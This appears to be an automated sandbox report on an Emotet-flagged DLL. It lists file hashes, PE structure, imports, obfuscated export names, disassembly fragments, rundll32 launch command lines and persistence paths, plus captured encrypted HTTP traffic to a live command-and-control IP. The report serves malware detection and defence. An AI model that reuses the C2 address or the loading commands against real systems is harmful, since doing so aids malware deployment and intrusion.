File name:	dUGnMYeP1C.dll
File size:	485376
MD5:	9369750d8d21d8fcb1b35365f232625f
SHA1:	30902a381e823450780e0efbbdc4d4130a032e20
SHA256:	8d91807aa27ee93694388b7cbfa9d74a3d93407036650cdd29631360b675853f
SHA512:	0679066f6419d764d98fef3a614b450be5d913a9888985d32d33279a422a59a32d7c6ec693d90734665024198c5c22d62ec0e85321485ddfe0dd513b3daaa2bc
SSDEEP:	12288:bdv8jkvzqZvv2wLBVmTi12yD88kYwZ1h1:b2Zvv2ccTi1v0Z1h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10015826
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61964C08 [Thu Nov 18 12:50:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	261bae8b02d2e7bf979e55d76b9dc786

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F75F4BF7057h
call 00007F75F4BF74AAh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F75F4BF6F08h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F75F4BE2E9Eh
mov dword ptr [esi], 1003B3E8h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B3F0h
mov dword ptr [ecx], 1003B3E8h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F75F4BE2E6Bh
mov dword ptr [esi], 1003B404h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B40Ch
mov dword ptr [ecx], 1003B404h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 1003B3DCh
push eax
call 00007F75F4BFA766h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F75F4BF705Ch
push 0000000Ch
push esi
call 00007F75F4BF64DDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F75F4BF6FCFh
push 0004CC44h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4d710	0x5c0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4dcd0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x24410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x33a0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x498f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3930c	0x39400	False	0.530729735262	data	6.66187646144	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x13cfe	0x13e00	False	0.464512087264	data	5.41556152438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4f000	0x252c	0x1800	False	0.223795572917	data	3.845062089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x24410	0x24600	False	0.818520457474	data	7.7494793776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x33a0	0x3400	False	0.71484375	data	6.58405020621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x758d0	0x98	ASCII text, with CRLF line terminators	English	United States
REGISTRY	0x75968	0x260	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x75bc8	0x69c	data	English	United States
RT_BITMAP	0x52220	0x23467	data	English	United States
RT_STRING	0x76268	0x26	data	English	United States
RT_VERSION	0x75688	0x244	data	English	United States
RT_MANIFEST	0x76290	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
KERNEL32.dll	GetErrorMode, GetThreadErrorMode, GetCommandLineA, GetEnvironmentStringsW, GetCurrentProcessorNumber, IsDebuggerPresent, GetTickCount64, AreFileApisANSI, GetOEMCP, GetCommandLineW, TlsAlloc, GetCurrentThreadId, GetSystemDefaultUILanguage, MultiByteToWideChar, RaiseException, GetLastError, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, FreeEnvironmentStringsW, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, InterlockedFlushSList, RtlUnwind, LocalFree, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, TlsFree, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, EncodePointer, GetSystemDefaultLangID, GetACP, SwitchToThread, IsProcessorFeaturePresent, UnregisterApplicationRestart, IsSystemResumeAutomatic, GetProcessHeap, CloseHandle, ReadFile, FindClose, GetUserDefaultUILanguage, FindNextFileA, SetStdHandle, WriteConsoleW, CreateFileW, GetCurrentProcess, SetUnhandledExceptionFilter, FlushFileBuffers, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, UnhandledExceptionFilter
USER32.dll	GetMenuCheckMarkDimensions, GetForegroundWindow, AnyPopup, CloseClipboard, GetClipboardViewer, GetWindowLongW, GetKBCodePage, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, SetWindowLongW, CharNextW, UnregisterClassW, DestroyCaret, EmptyClipboard, GetDialogBaseUnits, GetShellWindow, GetOpenClipboardWindow
GDI32.dll	SetBkMode, SetTextColor, CreateFontW, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, SelectObject, GetDeviceCaps, GetTextMetricsW
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW
ole32.dll	CoFreeUnusedLibraries, CoUninitialize, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	LoadRegTypeLib, SysAllocStringLen, SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, VariantClear, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
abziuleoxsborpb	2	0x10001570
aejkroaebsbxdnkhb	3	0x10001430
amgshvm	4	0x10001340
bjtmgxqrshhlmbh	5	0x10001320
ciqnowraabbra	6	0x100013e0
cmiqzvq	7	0x10001450
crprctzst	8	0x10001360
cwiynhgawsfh	9	0x100012f0
dhfyfrdbpo	10	0x100012c0
dvmyigplnf	11	0x10001480
erlpzdqhrlacaxnda	12	0x10001440
euduauchas	13	0x100014b0
fjorczheej	14	0x10001390
fqtruzg	15	0x100014c0
fzxvmnutn	16	0x100014d0
ghrfpkc	17	0x10001280
ghrmmrvezk	18	0x10001530
hjbgnfzrilso	19	0x100015d0
hvbblczdjkdx	20	0x10001310
ifsmmtyjag	21	0x10001310
jbgiwxjtyvvaxuitk	22	0x10001410
jhjtpuvq	23	0x10001260
jovvzziqyeznb	24	0x100015a0
kbkufclc	25	0x100014e0
kxpdpqduritjwfv	26	0x10001560
lfirwsslmgzmfg	27	0x10001330
mdaepyqwwigtzy	28	0x10001500
meqzizr	29	0x10001350
mmykgdmikdunzlhbb	30	0x10001520
mxqliouinhlsqvw	31	0x100013b0
mzxbssgzqetjmifs	32	0x10001490
ndzjkcaftnq	33	0x10001510
nfwlevhbaunupm	34	0x100013c0
njhdfbkyxqtwtcvsa	35	0x10001300
nmzgdiluzbemovs	36	0x10001400
obsypougzzamg	37	0x100013d0
oqzjqpsxbjh	38	0x100012d0
ormmaboaiinycs	39	0x10001230
pejacnmfhwmlhqc	40	0x10001340
pzgjkxaqryk	41	0x100015b0
qlsxhmuh	42	0x10001240
rykrtqanuszehh	43	0x10001550
sktlwejyhkbweva	44	0x100014a0
sromrbjt	45	0x10001460
txrogplicljtdlky	46	0x100012e0
tywxzfemhfuvwwqtq	47	0x10001270
ukeirvjwemstdk	48	0x10001250
usfroye	49	0x10001370
varapmou	50	0x100013a0
vjfbgya	51	0x100015c0
vpzxnmg	52	0x10001590
wniijfgeibtaumvma	53	0x100014f0
wtkpnwha	54	0x10001470
xkdmdojzjns	55	0x10001420
yumftkya	56	0x100012a0
ywkvngmohrw	57	0x10001380
ywwwgcpzcec	58	0x10001580
yyldomdvsymz	59	0x10001290
zdcdzgtngf	60	0x100012b0
zwxnlwalmcbgmt	61	0x100013f0
zzvywuxdvuecsm	62	0x10001540

Version Infos

Description	Data
InternalName	Erulfuaekg.dll
FileVersion	3.3.7.9
ProductName	Erulfuaekg
ProductVersion	3.3.7.9
FileDescription	asdzxcqwe123
OriginalFilename	Erulfuaekg.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/19/21-01:00:39.596565	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49763	443	192.168.2.4	51.178.61.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2021 01:00:39.596565008 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:39.596628904 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:39.596800089 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:39.680131912 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:39.680176020 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:39.796260118 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:39.796437025 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.647006989 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.647049904 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:41.647433996 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:41.647514105 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.656450987 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.700871944 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:41.896475077 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:41.896555901 CET	443	49763	51.178.61.60	192.168.2.4
Nov 19, 2021 01:00:41.896692038 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.896724939 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.901420116 CET	49763	443	192.168.2.4	51.178.61.60
Nov 19, 2021 01:00:41.901465893 CET	443	49763	51.178.61.60	192.168.2.4

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49763	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-19 00:00:41 UTC	OUT	GET /InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgU HTTP/1.1 Cookie: sbhozJBLsB=GBk0p7+mkeI5rWSXKi9+NkbuDAN7QDaXmyUi/sYe1oQpQspAP+UN+UaybMShDVRbP1B8IvhSKCUHJAYRRtEALN4oFplmYFQ82ingNRD/p7AiYoN6Z4om86TaWhNhyc2E6tH4MfN2LDyXUVu/1idF9te74dCx3ont9eszJJ5RNWPaX46p7K8F+cIzpv+J5OvQCSgHYYgi5GVms5sQuAEbCJ7NsR2cjbUSKQAbd9tLgWFOMQ== Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-19 00:00:41 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Nov 2021 00:00:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-11-19 00:00:41 UTC	IN	Data Raw: 32 35 35 0d 0a 4e 1b c8 28 c9 2f ca fe 81 e1 e7 85 05 ea 26 52 12 06 32 54 2c 56 77 39 63 ce 15 af d0 39 cc d7 cc 85 ae 1e 08 d9 72 5f 85 69 10 6c 66 2b 92 2b 32 f5 79 b6 a6 46 a3 ad 77 68 dc 1f d1 66 f8 5d 46 fb 77 cf 7d a6 4f 82 8f 73 df 95 14 02 ec a9 4a 3e 8d d3 13 ac d1 48 b2 2a 94 a8 25 3e 94 d1 93 29 fa a1 e4 3f 00 ab a7 96 90 32 cc aa a8 ba 5f 24 95 44 8d 29 6e c5 4b 1e d5 84 c3 aa 0a 87 02 ce 95 d9 97 79 c3 b8 85 ea 72 9f dd 80 b8 a5 9c 2b 94 e3 78 47 52 7b 08 23 d9 59 77 3c 76 41 62 84 82 43 a6 c6 e7 b5 7d 78 86 70 86 ca 74 24 0f a5 34 d5 8a b9 d9 c7 62 df 89 dd b6 82 a7 d7 c3 29 7c 50 e0 fa 23 f2 75 8a d6 ab ef bc 4d 73 d4 e5 0b 63 53 bb 3e 57 ed 4f 9d c5 60 b2 1a 5f c3 f2 46 b6 5b 7f e4 41 c5 b5 03 ce 46 a8 3a b8 f5 0f e4 ed cc 14 93 af f9 21 Data Ascii: 255N(/&R2T,Vw9c9r_ilf++2yFwhf]Fw}OsJ>H*%>)?2_$D)nKyr+xGR{#Yw<vAbC}xpt$4b)\|P#uMscS>WO`_F[AF:!

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6480 Parent PID: 6096

General

Start time:	00:59:17
Start date:	19/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll"
Imagebase:	0xd20000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.765628478.000000000166D000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6492 Parent PID: 6480

General

Start time:	00:59:18
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6508 Parent PID: 6480

General

Start time:	00:59:18
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.728810783.0000000003565000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6468 Parent PID: 6492

General

Start time:	00:59:18
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.726530504.00000000009CA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6544 Parent PID: 6480

General

Start time:	00:59:22
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,abziuleoxsborpb
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.753626316.000000000079A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6564 Parent PID: 6480

General

Start time:	00:59:26
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,aejkroaebsbxdnkhb
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.765555837.000000000089A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1688 Parent PID: 6468

General

Start time:	00:59:45
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1320 Parent PID: 6508

General

Start time:	00:59:46
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau",grPefdKmoEDD
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.777849090.000000000324A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3040 Parent PID: 6544

General

Start time:	00:59:53
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4596 Parent PID: 6564

General

Start time:	01:00:04
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1848 Parent PID: 6480

General

Start time:	01:00:04
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4928 Parent PID: 1320

General

Start time:	01:00:13
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Syakyqcviop\airusfmukngvit.rau",Control_RunDLL
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1180916673.00000000035CA000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 7108 Parent PID: 568

General

Start time:	01:00:33
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4936 Parent PID: 568

General

Start time:	01:01:06
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6552 Parent PID: 568

General

Start time:	01:01:23
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7128 Parent PID: 568

General

Start time:	01:01:35
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6480 Parent PID: 6096 loaddll32.exeCOMMON

Executed Functions

Function 6E4B6620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6E4B6692
__aullrem.LIBCMT ref: 6E4B66C6
GetTickCount64.KERNEL32 ref: 6E4B676C
GetTickCount64.KERNEL32 ref: 6E4B6772
GetTickCount64.KERNEL32 ref: 6E4B67A1
GetTickCount64.KERNEL32 ref: 6E4B67A7
GetShellWindow.USER32 ref: 6E4B6927
GetOEMCP.KERNEL32 ref: 6E4B69D2

Part of subcall function 6E4B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
Part of subcall function 6E4B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
Part of subcall function 6E4B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
Part of subcall function 6E4B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

CoFreeUnusedLibraries.OLE32 ref: 6E4B6A30

Part of subcall function 6E4B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
Part of subcall function 6E4B5A30: CloseClipboard.USER32 ref: 6E4B5A73
Part of subcall function 6E4B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30

Strings

?, xrefs: 6E4B691B

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: 1b67cb61ebf40b0d20b96364be7148eca39b9c9174b3006f5fbd5add474ed74a
Instruction ID: 31164d410186108e425455d71f6933d7d9c683c26e9b69d99925057bfb02b530
Opcode Fuzzy Hash: 1b67cb61ebf40b0d20b96364be7148eca39b9c9174b3006f5fbd5add474ed74a
Instruction Fuzzy Hash: 94137C31C10B5D8ADB12DFBAD840AADF3B5AF9A340F14875AE80977291EB3069D1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 013FCAA8, Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

i\[, xrefs: 013FCC0A
JrU, xrefs: 013FCB1C
:N, xrefs: 013FCC18

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID: CreateProcess
String ID: :N$JrU$i\[
API String ID: 963392458-199651125
Opcode ID: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction ID: d5a3e7cbe6ae27c362be07d38dc36ef005ea79424eada4e0c7489259d9db81af
Opcode Fuzzy Hash: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction Fuzzy Hash: EE613272D0020EEBDF05CFE5D94A9EEBBB6FB48308F208059E611B6260D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5730, Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

